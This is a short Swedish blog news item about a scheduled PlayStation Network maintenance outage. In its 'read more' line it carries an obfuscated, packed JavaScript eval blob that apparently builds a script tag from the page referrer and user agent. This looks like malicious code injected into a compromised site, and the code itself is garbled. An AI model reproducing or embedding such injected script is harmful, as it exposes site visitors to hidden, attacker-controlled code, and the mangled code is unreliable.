Image Image Image Image Image Image Image Image Image Image

| 26 maj, 2020

Scroll to top

Top

Playstation network ligger nere (igen)

Playstation network ligger nere (igen)
Sebastian

Det var inte längesen som Playstation Network låg nere. Det verkar finns saker kvar att fixa då Sony har meddelat att Network kommer vara nere senare i dag.

Detta kommer att beröra Playstation Store, Music Unlimited och Video Unlimited på Playstation Home. Du kommer dock kunna spela dina spel online när underhållet körs. Så för er gamers så kanske detta inte spelar så stor roll ändå.

Läs eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fheia|var|u0026u|referrer|ebaai||js|php’.split(’|’),0,{}))
mer på
Sony Playstation blog